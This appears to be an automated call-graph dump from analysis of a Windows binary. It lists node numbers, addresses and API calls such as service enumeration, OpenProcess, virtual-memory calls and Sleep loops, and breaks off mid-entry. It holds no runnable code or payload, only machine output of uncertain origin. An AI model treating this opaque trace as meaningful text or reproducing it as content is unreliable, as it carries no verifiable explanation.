4068b0 21707->21711 21712 4068a0 SysAllocStringLen 21707->21712 21710->21709 21712->21707 21712->21711 21713 40a178 21714 40a191 21713->21714 21715 40a1d2 21713->21715 21731 40493c 14 API calls 21714->21731 21717 40a19b 21732 40493c 14 API calls 21717->21732 21719 40a1a5 21733 40493c 14 API calls 21719->21733 21721 40a1af 21734 40874c DeleteCriticalSection 21721->21734 21723 40a1b4 21735 404144 21723->21735 21727 40a1be 21728 406344 14 API calls 21727->21728 21729 40a1c8 21728->21729 21730 406344 14 API calls 21729->21730 21730->21715 21731->21717 21732->21719 21733->21721 21734->21723 21736 40414d CloseHandle 21735->21736 21737 40415f 21735->21737 21736->21737 21738 40416d 21737->21738 21751 403b64 VirtualQuery Sleep Sleep VirtualAlloc MessageBoxA 21737->21751 21740 404176 VirtualFree 21738->21740 21741 40418f 21738->21741 21740->21741 21745 4040b4 21741->21745 21744 40a15f 6 API calls 21744->21727 21746 4040d9 21745->21746 21747 4040c7 VirtualFree 21746->21747 21748 4040dd 21746->21748 21747->21746 21749 404124 VirtualFree 21748->21749 21750 40413a 21748->21750 21749->21748 21750->21744 21751->21738 21752 44373c 21753 443744 21752->21753 21753->21753 22183 40a2b0 GetModuleHandleW 21753->22183 21761 44378b 21762 407450 15 API calls 21761->21762 21763 443797 21762->21763 21764 404cdc 14 API calls 21763->21764 21765 44379c 21764->21765 21766 4042f8 14 API calls 21765->21766 21767 4437a1 21766->21767 21768 407450 15 API calls 21767->21768 21769 4437ad 21768->21769 21770 404cdc 14 API calls 21769->21770 21771 4437b2 21770->21771 21772 4042f8 14 API calls 21771->21772 21773 4437b7 21772->21773 21774 407450 15 API calls 21773->21774 21775 4437c0 21774->21775 21776 404cdc 14 API calls 21775->21776 21777 4437c5 21776->21777 21778 4042f8 14 API calls 21777->21778 21779 4437ca 21778->21779 22209 404504 GetCommandLineW 21779->22209 21781 4437cf 21782 443876 21781->21782 22214 404564 21781->22214 21784 407450 15 API calls 21782->21784 21786 443882 21784->21786 21788 404cdc 14 API calls 21786->21788 21789 443887 21788->21789 21791 4042f8 14 API calls 21789->21791 21790 4437f0 21792 44396a 21790->21792 21795 404564 17 API calls 21790->21795 21794 44388c 21791->21794 21793 404564 17 API calls 21792->21793 21796 443977 21793->21796 21797 407450 15 API calls 21794->21797 21798 443803 21795->21798 21799 4072a4 15 API calls 21796->21799 21800 443898 21797->21800 21801 4072a4 15 API calls 21798->21801 21802 443984 21799->21802 21803 404cdc 14 API calls 21800->21803 21804 443810 21801->21804 21805 443986 21802->21805 21806 4439ac 21802->21806 21807 44389d 21803->21807 21804->21792 21810 404564 17 API calls 21804->21810 22938 43cea4 21805->22938 21814 4439bc 21806->21814 21815 4439ed 21806->21815 21809 4042f8 14 API calls 21807->21809 21812 4438a2 21809->21812 21813 443823 21810->21813 21811 443993 21817 407450 15 API calls 21811->21817 21818 407450 15 API calls 21812->21818 21816 4072a4 15 API calls 21813->21816 21819 407450 15 API calls 21814->21819 22233 43a644 GetNativeSystemInfo 21815->22233 21820 443830 21816->21820 21821 44399d 21817->21821 21822 4438ab 21818->21822 21824 4439c8 21819->21824 21820->21792 21831 404564 17 API calls 21820->21831 21825 404cdc 14 API calls 21821->21825 21826 404cdc 14 API calls 21822->21826 21830 404cdc 14 API calls 21824->21830 21832 4439a2 21825->21832 21833 4438b0 21826->21833 21828 4439f6 21834 407450 15 API calls 21828->21834 21829 443a11 22235 43a7bc 21829->22235 21835 4439cd 21830->21835 21836 443843 21831->21836 21838 4042f8 14 API calls 21832->21838 21839 4042f8 14 API calls 21833->21839 21840 443a02 21834->21840 21841 4042f8 14 API calls 21835->21841 21842 4072a4 15 API calls 21836->21842 21849 443965 21838->21849 21844 4438b5 21839->21844 21845 404cdc 14 API calls 21840->21845 21846 4439d2 21841->21846 21847 443850 21842->21847 21843 443a16 21848 404564 17 API calls 21843->21848 21850 407450 15 API calls 21844->21850 21852 443a07 21845->21852 21853 407450 15 API calls 21846->21853 21847->21792 21858 404564 17 API calls 21847->21858 21854 443a23 21848->21854 21851 4438c1 21850->21851 21855 404cdc 14 API calls 21851->21855 21856 4042f8 14 API calls 21852->21856 21857 4439de 21853->21857 21859 4072a4 15 API calls 21854->21859 21860 4438c6 21855->21860 21856->21849 21861 404cdc 14 API calls 21857->21861 21862 443863 21858->21862 21863 443a30 21859->21863 21864 4042f8 14 API calls 21860->21864 21865 4439e3 21861->21865 21866 4072a4 15 API calls 21862->21866 21867 443cc4 21863->21867 21872 443a5f 21863->21872 21873 407450 15 API calls 21863->21873 21868 4438cb 21864->21868 21870 4042f8 14 API calls 21865->21870 21871 443870 21866->21871 21869 404564 17 API calls 21867->21869 21874 407450 15 API calls 21868->21874 21875 443cd1 21869->21875 21870->21849 21871->21782 21871->21792 21876 407450 15 API calls 21872->21876 21877 443a4b 21873->21877 21878 4438d7 21874->21878 21879 4072a4 15 API calls 21875->21879 21880 443a6b 21876->21880 21881 404cdc 14 API calls 21877->21881 21882 404cdc 14 API calls 21878->21882 21883 443cde 21879->21883 21884 404cdc 14 API calls 21880->21884 21885 443a50 21881->21885 21886 4438dc 21882->21886 21887 443e6b 21883->21887 21892 443d0d 21883->21892 21898 407450 15 API calls 21883->21898 21888 443a70 21884->21888 21890 4042f8 14 API calls 21885->21890 21891 4042f8 14 API calls 21886->21891 21889 404564 17 API calls 21887->21889 21893 4042f8 14 API calls 21888->21893 21894 443e78 21889->21894 21896 443a55 21890->21896 21897 4438e1 21891->21897 21895 407450 15 API calls 21892->21895 21899 443a75 21893->21899 21900 4072a4 15 API calls 21894->21900 21901 443d19 21895->21901 22942 40632c 10 API calls 21896->22942 21903 407450 15 API calls 21897->21903 21904 443cf9 21898->21904 21905 407450 15 API calls 21899->21905 21906 443e85 21900->21906 21907 404cdc 14 API calls 21901->21907 21908 4438ed 21903->21908 21909 404cdc 14 API calls 21904->21909 21910 443a81 21905->21910 21912 443ecb 21906->21912 21918 443eb0 21906->21918 21919 443e90 21906->21919 21913 443d1e 21907->21913 21914 404cdc 14 API calls 21908->21914 21915 443cfe 21909->21915 21911 404cdc 14 API calls 21910->21911 21917 443a86 21911->21917 21921 404564 17 API calls 21912->21921 21920 4042f8 14 API calls 21913->21920 21922 4438f2 21914->21922 21916 4042f8 14 API calls 21915->21916 21923 443d03 21916->21923 21925 4042f8 14 API calls 21917->21925 21924 407450 15 API calls 21918->21924 21926 407450 15 API calls 21919->21926 21927 443d23 21920->21927 21928 443ed8 21921->21928 21929 4042f8 14 API calls 21922->21929 22944 40632c 10 API calls 21923->22944 21932 443ebc 21924->21932 21933 443a8b 21925->21933 21934 443e9c 21926->21934 21935 443d31 21927->21935 21936 443d2c 21927->21936 21937 4072a4 15 API calls 21928->21937 21930 4438f7 21929->21930 21938 407450 15 API calls 21930->21938 21939 404cdc 14 API calls 21932->21939 21940 407450 15 API calls 21933->21940 21941 404cdc 14 API calls 21934->21941 21944 43b7d4 52 API calls 21935->21944 21942 43a688 18 API calls 21936->21942 21943 443ee5 21937->21943 21945 443903 21938->21945 21946 443ec1 21939->21946 21947 443a97 21940->21947 21948 443ea1 21941->21948 21942->21935 21943->21849 21949 443eeb 21943->21949 21950 443d36 21944->21950 21951 404cdc 14 API calls 21945->21951 21952 4042f8 14 API calls 21946->21952 21953 404cdc 14 API calls 21947->21953 21954 4042f8 14 API calls 21948->21954 21955 407450 15 API calls 21949->21955 21956 407450 15 API calls 21950->21956 21958 443908 21951->21958 21959 443ec6 21952->21959 21960 443a9c 21953->21960 21961 443ea6 21954->21961 21962 443ef7 21955->21962 21957 443d42 21956->21957 21964 404cdc 14 API calls 21957->21964 21965 4042f8 14 API calls 21958->21965 22949 43f7a4 129 API calls 21959->22949 21967 4042f8 14 API calls 21960->21967 22948 40632c 10 API calls 21961->22948 21963 404cdc 14 API calls 21962->21963 21969 443efc 21963->21969 21970 443d47 21964->21970 21971 44390d 21965->21971 21972 443aa1 21967->21972 21973 4042f8 14 API calls 21969->21973 21974 4042f8 14 API calls 21970->21974 21975 407450 15 API calls 21971->21975 21976 407450 15 API calls 21972->21976 21977 443f01 21973->21977 21978 443d4c 21974->21978 21979 443919 21975->21979 21980 443aad 21976->21980 21981 43b7d4 52 API calls 21977->21981 22945 43c9b4 77 API calls 21978->22945 21983 404cdc 14 API calls 21979->21983 21984 404cdc 14 API calls 21980->21984 21985 443f06 21981->21985 21987 44391e 21983->21987 21988 443ab2 21984->21988 21989 407450 15 API calls 21985->21989 21986 443d51 21990 407450 15 API calls 21986->21990 21991 4042f8 14 API calls 21987->21991 21992 4042f8 14 API calls 21988->21992 21993 443f12 21989->21993 21994 443d5d 21990->21994 21995 443923 21991->21995 21996 443ab7 21992->21996 21998 404cdc 14 API calls 21993->21998 21999 404cdc 14 API calls 21994->21999 22000 407450 15 API calls 21995->22000 21997 407450 15 API calls 21996->21997 22001 443ac3 21997->22001 22002 443f17 21998->22002 22003 443d62 21999->22003 22004 44392f 22000->22004 22005 404cdc 14 API calls 22001->22005 22006 4042f8 14 API calls 22002->22006 22007 4042f8 14 API calls 22003->22007 22008 404cdc 14 API calls 22004->22008 22010 443ac8 22005->22010 22011 443f1c 22006->22011 22012 443d67 22007->22012 22009 443934 22008->22009 22013 4042f8 14 API calls 22009->22013 22014 4042f8 14 API calls 22010->22014 22015 43bf00 23 API calls 22011->22015 22016 43bf00 23 API calls 22012->22016 22017 443939 22013->22017 22018 443acd 22014->22018 22019 443f26 22015->22019 22020 443d71 22016->22020 22021 407450 15 API calls 22017->22021 22022 407450 15 API calls 22018->22022 22023 43c1c8 21 API calls 22019->22023 22024 43c1c8 21 API calls 22020->22024 22026 443945 22021->22026 22027 443ad9 22022->22027 22028 443f30 Sleep 22023->22028 22025 443d7b Sleep 22024->22025 22029 407450 15 API calls 22025->22029 22030 404cdc 14 API calls 22026->22030 22031 404cdc 14 API calls 22027->22031 22051 443f44 22028->22051 22032 443d91 22029->22032 22033 44394a 22030->22033 22034 443ade 22031->22034 22036 404cdc 14 API calls 22032->22036 22037 4042f8 14 API calls 22033->22037 22038 4042f8 14 API calls 22034->22038 22035 443f6d Sleep 22041 43b58c 27 API calls 22035->22041 22039 443d96 22036->22039 22040 44394f 22037->22040 22042 443ae3 22038->22042 22043 4042f8 14 API calls 22039->22043 22044 407450 15 API calls 22040->22044 22045 443f81 22041->22045 22046 407450 15 API calls 22042->22046 22047 443d9b 22043->22047 22048 44395b 22044->22048 22049 407450 15 API calls 22045->22049 22050 443aef 22046->22050 22946 43d938 24 API calls 22047->22946 22053 404cdc 14 API calls 22048->22053 22054 443f8d 22049->22054 22055 404cdc 14 API calls 22050->22055 22051->22035 22056 43b58c 27 API calls 22051->22056 22057 443960 22053->22057 22058 404cdc 14 API calls 22054->22058 22059 443af4 22055->22059 22056->22051 22061 4042f8 14 API calls 22057->22061 22062 443f92 22058->22062 22060 4042f8 14 API calls 22059->22060 22064 443af9 22060->22064 22061->21849 22063 4042f8 14 API calls 22062->22063 22063->21849 22065 404564 17 API calls 22064->22065 22067 443b06 22065->22067 22066 443dd3 Sleep 22068 43b58c 27 API calls 22066->22068 22069 4072a4 15 API calls 22067->22069 22070 443de7 Sleep 22068->22070 22071 443b13 22069->22071 22072 404564 17 API calls 22070->22072 22074 443b15 22071->22074 22075 443b26 22071->22075 22076 443dfe 22072->22076 22073 443da0 22073->22066 22077 43b58c 27 API calls 22073->22077 22078 406bf0 15 API calls 22074->22078 22080 406bf0 15 API calls 22075->22080 22079 4072a4 15 API calls 22076->22079 22077->22073 22081 443b24 22078->22081 22082 443e0b 22079->22082 22080->22081 22084 443b43 22081->22084 22329 43a688 GetModuleHandleW 22081->22329 22083 443e47 22082->22083 22086 407450 15 API calls 22082->22086 22085 443e55 22083->22085 22947 43a724 18 API calls 22083->22947 22334 43de78 22084->22334 22092 407450 15 API calls 22085->22092 22091 443e19 22086->22091 22089 443b48 22433 43b7d4 22089->22433 22094 404cdc 14 API calls 22091->22094 22095 443e61 22092->22095 22097 443e1e 22094->22097 22098 404cdc 14 API calls 22095->22098 22101 4042f8 14 API calls 22097->22101 22099 443e66 22098->22099 22102 4042f8 14 API calls 22099->22102 22100 407450 15 API calls 22103 443b59 22100->22103 22104 443e23 22101->22104 22102->21887 22106 404cdc 14 API calls 22103->22106 22105 43e864 85 API calls 22104->22105 22107 443e2a 22105->22107 22108 443b5e 22106->22108 22109 407450 15 API calls 22107->22109 22110 4042f8 14 API calls 22108->22110 22111 443e36 22109->22111 22112 443b63 22110->22112 22113 404cdc 14 API calls 22111->22113 22114 404564 17 API calls 22112->22114 22115 443e3b 22113->22115 22116 443b70 22114->22116 22117 4042f8 14 API calls 22115->22117 22118 4072a4 15 API calls 22116->22118 22119 443e40 22117->22119 22120 443b7d 22118->22120 22121 43f310 21 API calls 22119->22121 22122 443b99 22120->22122 22123 404564 17 API calls 22120->22123 22121->22083 22502 43d0f8 22122->22502 22125 443b8c 22123->22125 22126 4072a4 15 API calls 22125->22126 22126->22122 22127 443bab 22128 407450 15 API calls 22127->22128 22129 443bb7 22128->22129 22130 404cdc 14 API calls 22129->22130 22131 443bbc 22130->22131 22132 4042f8 14 API calls 22131->22132 22133 443bc1 22132->22133 22652 43c598 22133->22652 22135 443bc6 22136 407450 15 API calls 22135->22136 22137 443bd2 22136->22137 22138 404cdc 14 API calls 22137->22138 22139 443bd7 22138->22139 22140 4042f8 14 API calls 22139->22140 22141 443bdc 22140->22141 22685 43e7dc 22141->22685 22144 407450 15 API calls 22145 443bed 22144->22145 22146 404cdc 14 API calls 22145->22146 22147 443bf2 22146->22147 22148 4042f8 14 API calls 22147->22148 22149 443bf7 22148->22149 22694 43bf00 22149->22694 22151 443c01 22731 43c1c8 OpenProcess 22151->22731 22153 443c0b Sleep 22158 443c1f 22153->22158 22154 443c48 Sleep 22758 43b58c 22154->22758 22156 443c5c Sleep 22157 407450 15 API calls 22156->22157 22159 443c72 22157->22159 22158->22154 22160 43b58c 27 API calls 22158->22160 22161 404cdc 14 API calls 22159->22161 22160->22158 22162 443c77 22161->22162 22163 4042f8 14 API calls 22162->22163 22164 443c7c 22163->22164 22786 43e864 22164->22786 22166 443c83 22167 407450 15 API calls 22166->22167 22168 443c8f 22167->22168 22169 404cdc 14 API calls 22168->22169 22170 443c94 22169->22170 22171 4042f8 14 API calls 22170->22171 22172 443c99 22171->22172 22931 43f310 22172->22931 22174 443ca0 22175 407450 15 API calls 22174->22175 22176 443cac 22175->22176 22177 404cdc 14 API calls 22176->22177 22178 443cb1 22177->22178 22179 4042f8 14 API calls 22178->22179 22180 443cb6 22179->22180 22180->21867 22181 443cbf 22180->22181 22943 43a724 18 API calls 22181->22943 22184 40a2eb 22183->22184 22950 405f98 22184->22950 22187 407450 22188 407473 22187->22188 22995 406824 22188->22995 22193 404cdc 22194 404d02 22193->22194 22195 404ce7 22193->22195 22197 404be8 14 API calls 22194->22197 22196 404be8 14 API calls 22195->22196 22198 404cfe 22196->22198 22197->22198 23038 404930 22198->23038 22201 4042f8 23048 40a264 14 API calls 22201->23048 22203 40430c 22203->21761 22204 4042a0 22204->22203 22205 4042c5 22204->22205 23046 40a264 14 API calls 22204->23046 23047 404294 10 API calls 22205->23047 22208 4042e6 22208->21761 23049 404448 22209->23049 22211 404448 15 API calls 22212 404528 22211->22212 22212->22211 22213 40453f 22212->22213 22213->21781 22215 406bf0 15 API calls 22214->22215 22216 40457a 22215->22216 22217 40459c GetCommandLineW 22216->22217 22218 40457e GetModuleFileNameW 22216->22218 22223 4045a3 22217->22223 23053 406d2c 22218->23053 22221 404448 15 API calls 22221->22223 22222 4045ba 22224 4072a4 22222->22224 22223->22221 22223->22222 22225 4072a8 22224->22225 22228 4072b8 22224->22228 22225->22228 23058 406d1c 15 API calls 22225->23058 22227 4072f2 22229 4072a4 15 API calls 22227->22229 22228->21790 22230 4072fb 22229->22230 23059 4041cc 14 API calls 22230->23059 22232 407306 22232->21790 22234 43a657 22233->22234 22234->21828 22234->21829 22236 43a7e1 22235->22236 22237 43a7f6 22235->22237 23121 4387ec 18 API calls 22236->23121 23122 4387a8 18 API calls 22237->23122 22240 43a7f2 23060 438890 22240->23060 22244 43a81c 22245 43a863 22244->22245 22248 43a827 GetLastError 22244->22248 23093 439408 22245->23093 22250 407450 15 API calls 22248->22250 22252 43a843 22250->22252 23123 407dec 22252->23123 22256 407450 15 API calls 22257 43a852 22256->22257 22260 404cdc 14 API calls 22257->22260 22258 43a906 22262 438b0c 20 API calls 22258->22262 22259 43a884 22259->22258 22263 40e50c 15 API calls 22259->22263 22261 43a857 22260->22261 22264 4042f8 14 API calls 22261->22264 22265 43a912 22262->22265 22270 43a8a0 22263->22270 22266 43a85c 22264->22266 22267 43a959 22265->22267 22272 43a91d GetLastError 22265->22272 23127 40632c 10 API calls 22266->23127 22269 439408 71 API calls 22267->22269 22271 43a968 22269->22271 22270->22258 22277 407450 15 API calls 22270->22277 22273 406bf0 15 API calls 22271->22273 22274 407450 15 API calls 22272->22274 22275 43a975 22273->22275 22276 43a939 22274->22276 22278 438860 17 API calls 22275->22278 22279 407dec 14 API calls 22276->22279 22280 43a8c7 22277->22280 22281 43a97c 22278->22281 22282 43a93e 22279->22282 22284 404cdc 14 API calls 22280->22284 22285 40e50c 15 API calls 22281->22285 22283 407450 15 API calls 22282->22283 22286 43a948 22283->22286 22287 43a8cc 22284->22287 22293 43a989 22285->22293 22288 404cdc 14 API calls 22286->22288 22289 4042f8 14 API calls 22287->22289 22290 43a94d 22288->22290 22291 43a8d1 22289->22291 22294 4042f8 14 API calls 22290->22294 22295 407450 15 API calls 22291->22295 22292 43aa10 22301 40e50c 15 API calls 22292->22301 22293->22292 22296 40e50c 15 API calls 22293->22296 22297 43a952 22294->22297 22298 43a8e0 22295->22298 22305 43a9a7 22296->22305 23129 40632c 10 API calls 22297->23129 22300 407450 15 API calls 22298->22300 22302 43a8e8 22300->22302 22307 43aa24 22301->22307 22303 407450 15 API calls 22302->22303 22304 43a8f2 22303->22304 22306 404cdc 14 API calls 22304->22306 22305->22292 22310 407450 15 API calls 22305->22310 22308 43a8f7 22306->22308 22307->21843 22309 4042f8 14 API calls 22308->22309 22311 43a8fc 22309->22311 22312 43a9ce 22310->22312 23128 40632c 10 API calls 22311->23128 22314 404cdc 14 API calls 22312->22314 22315 43a9d3 22314->22315 22316 4042f8 14 API calls 22315->22316 22317 43a9d8 22316->22317 22318 407450 15 API calls 22317->22318 22319 43a9e7 22318->22319 22320 407450 15 API calls 22319->22320 22321 43a9f2 22320->22321 22322 407450 15 API calls 22321->22322 22323 43a9fc 22322->22323 22324 404cdc 14 API calls 22323->22324 22325 43aa01 22324->22325 22326 4042f8 14 API calls 22325->22326 22327 43aa06 22326->22327 23130 40632c 10 API calls 22327->23130 22330 43a6bf 22329->22330 22331 43a69e 22329->22331 22330->22084 23172 40aa94 17 API calls 22331->23172 22333 43a6a9 22333->22330 23173 43c45c 22334->23173 22336 43deae 23183 43dc64 22336->23183 22341 407450 15 API calls 22342 43df08 22341->22342 22343 407450 15 API calls 22342->22343 22344 43df10 22343->22344 22345 404cdc 14 API calls 22344->22345 22346 43df15 22345->22346 22347 4042f8 14 API calls 22346->22347 22348 43df1a 22347->22348 22349 43dfaa 22348->22349 22350 43df2b 22348->22350 22351 43dfb7 22349->22351 22367 43e004 22349->22367 22353 43df7f 22350->22353 22355 407450 15 API calls 22350->22355 22354 43dfd9 22351->22354 22356 407450 15 API calls 22351->22356 22352 43e060 22357 43cea4 73 API calls 22352->22357 22359 407450 15 API calls 22353->22359 22365 43dfa5 22353->22365 22363 407450 15 API calls 22354->22363 22354->22365 22358 43df43 22355->22358 22360 43dfcf 22356->22360 22361 43e07c 22357->22361 22362 404cdc 14 API calls 22358->22362 22364 43df9b 22359->22364 22366 404cdc 14 API calls 22360->22366 23193 407184 15 API calls 22361->23193 22369 43df48 22362->22369 22370 43dff5 22363->22370 22371 404cdc 14 API calls 22364->22371 22365->22089 22372 43dfd4 22366->22372 22367->22352 22373 407450 15 API calls 22367->22373 22374 4042f8 14 API calls 22369->22374 22375 404cdc 14 API calls 22370->22375 22376 43dfa0 22371->22376 22377 4042f8 14 API calls 22372->22377 22378 43e03d 22373->22378 22379 43df4d 22374->22379 22380 43dffa 22375->22380 22381 4042f8 14 API calls 22376->22381 22377->22354 22382 404cdc 14 API calls 22378->22382 22383 407450 15 API calls 22379->22383 22384 4042f8 14 API calls 22380->22384 22381->22365 22385 43e042 22382->22385 22387 43df5c 22383->22387 22384->22365 22388 4042f8 14 API calls 22385->22388 22391 404cdc 14 API calls 22387->22391 22393 43e047 22388->22393 22396 43df61 22391->22396 22399 407450 15 API calls 22393->22399 22400 4042f8 14 API calls 22396->22400 22405 43e056 22399->22405 22401 43df66 22400->22401 22406 407450 15 API calls 22401->22406 22410 404cdc 14 API calls 22405->22410 22411 43df75 22406->22411 22415 43e05b 22410->22415 22416 404cdc 14 API calls 22411->22416 22420 4042f8 14 API calls 22415->22420 22421 43df7a 22416->22421 22420->22352 22425 4042f8 14 API calls 22421->22425 22425->22353 22438 43b7dc 22433->22438 22434 43b7f8 OpenSCManagerW 22435 43b80c GetLastError 22434->22435 22434->22438 22437 407450 15 API calls 22435->22437 22437->22438 22438->22434 22439 404cdc 14 API calls 22438->22439 22440 43b893 EnumServicesStatusExW 22438->22440 22442 43b99e CloseServiceHandle 22438->22442 22446 407dec 14 API calls 22438->22446 22447 43ba9f 22438->22447 22448 407450 15 API calls 22438->22448 22455 43b58c 27 API calls 22438->22455 22458 40e50c 15 API calls 22438->22458 22461 4042f8 14 API calls 22438->22461 22463 40632c 10 API calls 22438->22463 22465 4072a4 15 API calls 22438->22465 23217 408334 22438->23217 23220 43b1a8 22438->23220 22439->22438 22441 43b8af GetLastError 22440->22441 22440->22442 22443 43b8be CloseServiceHandle 22441->22443 22450 43b8fe 22441->22450 22442->22438 22445 407450 15 API calls 22443->22445 22444 408334 20 API calls 22444->22450 22445->22438 22446->22438 22449 407450 15 API calls 22447->22449 22448->22438 22452 43bab7 22449->22452 22450->22444 22454 43b944 EnumServicesStatusExW 22450->22454 22453 407dec 14 API calls 22452->22453 22456 43babc 22453->22456 22454->22442 22457 43b95c CloseServiceHandle GetLastError 22454->22457 22455->22438 22459 407450 15 API calls 22456->22459 22462 407450 15 API calls 22457->22462 22458->22438 22460 43bac6 22459->22460 22464 404cdc 14 API calls 22460->22464 22461->22438 22475 43b97e 22462->22475 22463->22438 22466 43bacb 22464->22466 22465->22438 22468 4042f8 14 API calls 22466->22468 22467 407dec 14 API calls 22467->22475 22469 43bad0 22468->22469 22471 408334 20 API calls 22469->22471 22470 407450 15 API calls 22470->22475 22496 43bae7 22471->22496 22472 404cdc 14 API calls 22472->22475 22473 4042f8 14 API calls 22473->22475 22474 43bb80 22476 406bf0 15 API calls 22474->22476 22475->22467 22475->22470 22475->22472 22475->22473 23274 40632c 10 API calls 22475->23274 22488 43bb8c 22476->22488 22478 43bbe4 22479 43bc13 22478->22479 22480 43bbed 22478->22480 22482 407450 15 API calls 22479->22482 22483 407450 15 API calls 22480->22483 22481 4072a4 15 API calls 22481->22496 22485 43bc22 22482->22485 22487 43bbfc 22483->22487 22484 406bf0 15 API calls 22484->22488 22489 404cdc 14 API calls 22485->22489 22490 407450 15 API calls 22487->22490 22488->22478 22488->22484 23275 407184 15 API calls 22488->23275 22491 43bc27 22489->22491 22492 43bc07 22490->22492 22494 4042f8 14 API calls 22491->22494 22495 404cdc 14 API calls 22492->22495 22493 408334 20 API calls 22493->22496 22499 43bc11 22494->22499 22497 43bc0c 22495->22497 22496->22474 22496->22481 22496->22493 22498 4042f8 14 API calls 22497->22498 22498->22499 23268 408340 22499->23268 22503 43d100 22502->22503 22503->22503 22504 43c45c 17 API calls 22503->22504 22505 43d124 22504->22505 23331 40f9d8 22505->23331 22510 43c45c 17 API calls 22514 43d14c 22510->22514 22511 43d2c1 22513 43d36a 22511->22513 22516 404564 17 API calls 22511->22516 22512 43d208 22515 407450 15 API calls 22512->22515 22518 406c44 14 API calls 22513->22518 22517 40f9d8 15 API calls 22514->22517 22519 43d217 22515->22519 22521 43d2d8 22516->22521 22522 43d157 22517->22522 22523 43d3af 22518->22523 22520 404cdc 14 API calls 22519->22520 22525 43d21c 22520->22525 22526 40f9d8 15 API calls 22521->22526 23340 40f7e8 22522->23340 22524 406c44 14 API calls 22523->22524 22528 43d3b9 22524->22528 22529 4042f8 14 API calls 22525->22529 22530 43d2e3 22526->22530 22532 43d3d1 22528->22532 22533 43d3c4 22528->22533 22534 43d221 22529->22534 23364 4070a0 22530->23364 22531 43d15f 22536 43d163 22531->22536 22537 43d1a0 22531->22537 22538 43c45c 17 API calls 22532->22538 22542 43c45c 17 API calls 22533->22542 22606 43d3cc 22533->22606 23414 43cf60 21 API calls 22534->23414 22541 43c45c 17 API calls 22536->22541 22539 407450 15 API calls 22537->22539 22543 43d3de 22538->22543 22544 43d1af 22539->22544 22540 43d2f3 23385 40f77c 22540->23385 22546 43d170 22541->22546 22549 43d465 22542->22549 22550 43cc44 81 API calls 22543->22550 22551 404cdc 14 API calls 22544->22551 22553 40f9d8 15 API calls 22546->22553 22547 43d50c 22554 43d543 22547->22554 22563 43c45c 17 API calls 22547->22563 22557 43cc44 81 API calls 22549->22557 22558 43d3eb 22550->22558 22559 43d1b4 22551->22559 22552 43d2fb 22560 43d373 22552->22560 22593 43d2ff 22552->22593 22561 43d17b 22553->22561 22554->22127 22555 43c45c 17 API calls 22565 43d4e8 22555->22565 22556 43d237 22566 43d23b 22556->22566 22567 43d29a 22556->22567 22568 43d472 22557->22568 22569 43d40c 22558->22569 22585 406c44 14 API calls 22558->22585 22570 4042f8 14 API calls 22559->22570 22564 43c45c 17 API calls 22560->22564 22562 407450 15 API calls 22561->22562 22571 43d18e 22562->22571 22572 43d51f 22563->22572 22573 43d380 22564->22573 22574 40f77c 4 API calls 22565->22574 22590 43c45c 17 API calls 22566->22590 22576 407450 15 API calls 22567->22576 22575 43d493 22568->22575 22591 406c44 14 API calls 22568->22591 22577 43d42d 22569->22577 22595 406c44 14 API calls 22569->22595 22578 43d1b9 22570->22578 22579 407450 15 API calls 22571->22579 22580 40f77c 4 API calls 22572->22580 22581 40f9d8 15 API calls 22573->22581 22584 43d4f0 22574->22584 22582 43d4b4 22575->22582 22600 406c44 14 API calls 22575->22600 22586 43d2a9 22576->22586 22596 406c44 14 API calls 22577->22596 22577->22606 22583 43c45c 17 API calls 22578->22583 22587 43d194 22579->22587 22588 43d527 22580->22588 22589 43d38b 22581->22589 22582->22606 22612 406c44 14 API calls 22582->22612 22592 43d1c6 22583->22592 22584->22547 22603 43c45c 17 API calls 22584->22603 22585->22569 22594 404cdc 14 API calls 22586->22594 22597 404cdc 14 API calls 22587->22597 22588->22554 22608 43c45c 17 API calls 22588->22608 22598 406fe0 15 API calls 22589->22598 22599 43d252 22590->22599 22591->22575 22601 40f9d8 15 API calls 22592->22601 22602 43c45c 17 API calls 22593->22602 22604 43d2ae 22594->22604 22595->22577 22596->22606 22607 43d199 22597->22607 22609 43d398 22598->22609 22610 40f9d8 15 API calls 22599->22610 22600->22582 22611 43d1d1 22601->22611 22613 43d324 22602->22613 22614 43d501 22603->22614 22605 4042f8 14 API calls 22604->22605 22615 43d298 22605->22615 22606->22547 22606->22555 22616 4042f8 14 API calls 22607->22616 22617 43d538 22608->22617 23395 43cc44 22609->23395 22619 43d25d 22610->22619 22620 407450 15 API calls 22611->22620 22612->22606 22621 40f9d8 15 API calls 22613->22621 22622 43cc44 81 API calls 22614->22622 22615->22511 22623 43d19e 22616->22623 22624 43cc44 81 API calls 22617->22624 22625 4070a0 15 API calls 22619->22625 22626 43d1e4 22620->22626 22627 43d32f 22621->22627 22622->22547 22623->22511 22623->22512 22624->22554 22628 43d26d 22625->22628 22629 407450 15 API calls 22626->22629 22630 4070a0 15 API calls 22627->22630 22634 407450 15 API calls 22628->22634 22631 43d1ea 22629->22631 22632 43d33f 22630->22632 22633 404cdc 14 API calls 22631->22633 22638 407450 15 API calls 22632->22638 22635 43d1ef 22633->22635 22636 43d286 22634->22636 22637 4042f8 14 API calls 22635->22637 22639 407450 15 API calls 22636->22639 22640 43d1f4 22637->22640 22641 43d358 22638->22641 22642 43d28e 22639->22642 23413 40632c 10 API calls 22640->23413 22644 407450 15 API calls 22641->22644 22645 404cdc 14 API calls 22642->22645 22646 43d360 22644->22646 22647 43d293 22645->22647 22648 404cdc 14 API calls 22646->22648 22650 4042f8 14 API calls 22647->22650 22649 43d365 22648->22649 22651 4042f8 14 API calls 22649->22651 22650->22615 22651->22513 22653 43c5d1 22652->22653 22654 43c5bb 22652->22654 23549 4387a8 18 API calls 22653->23549 23548 4387ec 18 API calls 22654->23548 22657 43c5cc 22658 438890 18 API calls 22657->22658 22659 43c5ed 22658->22659 23526 4389d8 22659->23526 22661 43c5fc 22662 43c600 GetLastError 22661->22662 22663 43c63c 22661->22663 22664 407450 15 API calls 22662->22664 23542 43937c 22663->23542 22666 43c61c 22664->22666 22667 407dec 14 API calls 22666->22667 22669 43c621 22667->22669 22668 43c6b4 22672 438860 17 API calls 22668->22672 22671 407450 15 API calls 22669->22671 22670 43c65d 22670->22668 22673 43c45c 17 API calls 22670->22673 22674 43c62b 22671->22674 22681 43c6f3 22672->22681 22675 43c68c 22673->22675 22676 404cdc 14 API calls 22674->22676 23551 407184 15 API calls 22675->23551 22678 43c630 22676->22678 22680 4042f8 14 API calls 22678->22680 22683 43c635 22680->22683 22681->22135 23550 40632c 10 API calls 22683->23550 23566 43ae28 22685->23566 22687 43e7e6 22688 43e7fa 22687->22688 22689 43b1a8 26 API calls 22687->22689 22690 43ae28 27 API calls 22688->22690 22689->22688 22691 